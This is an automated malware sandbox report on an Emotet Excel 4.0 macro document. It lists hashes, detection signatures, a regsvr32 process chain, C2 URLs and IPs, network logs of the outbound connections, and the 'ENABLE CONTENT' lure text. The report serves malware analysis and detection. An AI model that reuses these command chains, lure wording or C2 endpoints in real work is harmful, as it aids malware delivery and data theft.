Windows Analysis Report
Documento.xlsm

Overview

General Information

Sample Name: Documento.xlsm
Analysis ID: 578182
MD5: 5acc6f1ff8366ddc895392da4e6a50e3
SHA1: 45b3ef65a4dabdbbefec603fe3dca9bfb1c5c643
SHA256: 0bb184f9c3e9cda4571bd806b90dbda484c331d9dce7af784405fd211f6c71c4
Tags: xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Command Line Without DLL
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (UrlDownloadToFile)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1592 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1220 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)
      • regsvr32.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj" MD5: 432BE6CF7311062633459EEF6B242FB5)
        • regsvr32.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje" MD5: 432BE6CF7311062633459EEF6B242FB5)
          • regsvr32.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn" MD5: 432BE6CF7311062633459EEF6B242FB5)
            • regsvr32.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt" MD5: 432BE6CF7311062633459EEF6B242FB5)
              • regsvr32.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt" MD5: 432BE6CF7311062633459EEF6B242FB5)
                • regsvr32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo" MD5: 432BE6CF7311062633459EEF6B242FB5)
                  • regsvr32.exe (PID: 2684 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv" MD5: 432BE6CF7311062633459EEF6B242FB5)
                    • regsvr32.exe (PID: 2092 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee" MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup
Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

Source | Rule | Description | Author | Strings
9.2.regsvr32.exe.190000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
9.2.regsvr32.exe.1e0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
6.2.regsvr32.exe.7e0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.regsvr32.exe.160000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.regsvr32.exe.200000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

System Summary

Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 1220, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", ProcessId: 2216
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, ProcessId: 1220
Source: Network Connection, Author: Dmitriy Lifanov, oscd.community, Data: DestinationIp: 135.148.121.246, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 2092, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Data: DestinationIp: 8.8.8.8, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 52167
                        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

AV Detection

Source: https://135.148.121.246/j, Avira URL Cloud: Label: malware
Source: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A, Avira URL Cloud: Label: malware
Source: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H, Avira URL Cloud: Label: malware
Source: https://135.148.121.246/b, Avira URL Cloud: Label: malware
Source: 9.2.regsvr32.exe.190000.0.raw.unpack, Malware Configuration Extractor: Emotet
Source: Documento.xlsm, Virustotal: Detection: 40%
Source: Documento.xlsm, ReversingLabs: Detection: 39%
Source: www.swaong.com, Virustotal: Detection: 5%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,3_2_1000D150
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1002084E __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002084E
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1002A9C8 LoadIconA,FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,3_2_1002A9C8
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 11_2_002627C2 FindFirstFileW,11_2_002627C2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: BRqk58WkNweubruYwrLOt[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic, TCP traffic: 192.168.2.22:49168 -> 135.148.121.246:8080
Source: global traffic, DNS query: name: www.swaong.com

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe, Network Connect: 135.148.121.246 144
Source: Joe Sandbox View, ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View, ASN Name: S-NET-ASPL S-NET-ASPL
Source: Joe Sandbox View, IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View, IP Address: 185.157.82.211 185.157.82.211
Source: global traffic, TCP traffic: 192.168.2.22:49168 -> 135.148.121.246:8080
Source: unknown, Network traffic detected: IP country count 24
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3429A7BE.jpeg
Source: unknown, DNS traffic detected: queries for: www.swaong.com
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1002818E recv,3_2_1002818E
Source: unknown, TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1002B47F SendMessageA,SendMessageA,GetAsyncKeyState,SendMessageA,3_2_1002B47F
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_100392CA __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_100392CA
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1001A057 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_1001A057
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_1003684C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1003684C

                        E-Banking Fraud

                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.1a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.300000.1.unpack, type: UNPACKEDPE

                        System Summary

                        Source: Documento.xlsm, Macro extractor: Sheet: EFWFSFG contains: URLDownloadToFileA
                        Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
                        Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
                        Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                        Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                        Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                        Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                        Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                        Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                        Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                        Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                        Source: Screenshot number: 12, Screenshot OCR: ENABLE EDITING" and "ENABLE CC 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Id 1 p p
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\xxw1.ocx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll
                        Source: Documento.xlsm, Initial sample: EXEC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D88446_2_008D8844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E4E546_2_008E4E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F0E7A6_2_008F0E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F13A36_2_008F13A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D8FE96_2_008D8FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E81316_2_008E8131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D4B406_2_008D4B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008ED15E6_2_008ED15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E416E6_2_008E416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D188C6_2_008D188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E3E896_2_008E3E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E92856_2_008E9285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EA6836_2_008EA683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E70986_2_008E7098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E6E976_2_008E6E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E30946_2_008E3094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008ED4AE6_2_008ED4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DD4BC6_2_008DD4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DAEBB6_2_008DAEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E66C86_2_008E66C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EEEC26_2_008EEEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DA4DE6_2_008DA4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EFAD16_2_008EFAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E86EE6_2_008E86EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DC4E56_2_008DC4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E8EF86_2_008E8EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DE4F56_2_008DE4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D22F76_2_008D22F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E9A0C6_2_008E9A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F1A0A6_2_008F1A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F0A016_2_008F0A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D9C1B6_2_008D9C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D70136_2_008D7013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DCA3C6_2_008DCA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E7E3D6_2_008E7E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E32316_2_008E3231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E604B6_2_008E604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D1A5F6_2_008D1A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DE65A6_2_008DE65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E90546_2_008E9054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D806B6_2_008D806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D186B6_2_008D186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D958A6_2_008D958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E39836_2_008E3983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E27836_2_008E2783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E7B9E6_2_008E7B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E519C6_2_008E519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E69986_2_008E6998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EF9AF6_2_008EF9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E35A36_2_008E35A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008ECFA06_2_008ECFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F23B96_2_008F23B9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DA9CF6_2_008DA9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D1DCA6_2_008D1DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F1FC76_2_008F1FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EF5D96_2_008EF5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E17D26_2_008E17D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EE5ED6_2_008EE5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DCDE06_2_008DCDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D71E36_2_008D71E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008F05F66_2_008F05F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EF7F46_2_008EF7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E490E6_2_008E490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EAF0B6_2_008EAF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DED0A6_2_008DED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E05036_2_008E0503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E2B1F6_2_008E2B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EA9166_2_008EA916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DBB146_2_008DBB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D27106_2_008D2710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D43136_2_008D4313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EDF2B6_2_008EDF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E1B296_2_008E1B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D2F366_2_008D2F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E77306_2_008E7730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D93436_2_008D9343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D3F5A6_2_008D3F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008DC1516_2_008DC151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EE1686_2_008EE168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008E89666_2_008E8966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D77616_2_008D7761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008EBD636_2_008EBD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E303A9_2_001E303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F4E549_2_001F4E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E364E9_2_001E364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00200E7A9_2_00200E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E88449_2_001E8844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00201E499_2_00201E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E82D29_2_001E82D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E50CF9_2_001E50CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FFECB9_2_001FFECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F81319_2_001F8131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FD15E9_2_001FD15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E4B409_2_001E4B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F416E9_2_001F416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_002013A39_2_002013A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E8FE99_2_001E8FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E9C1B9_2_001E9C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E70139_2_001E7013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F9A0C9_2_001F9A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00200A019_2_00200A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F7E3D9_2_001F7E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001ECA3C9_2_001ECA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00201A0A9_2_00201A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F32319_2_001F3231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E1A5F9_2_001E1A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EE65A9_2_001EE65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F90549_2_001F9054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F604B9_2_001F604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E806B9_2_001E806B
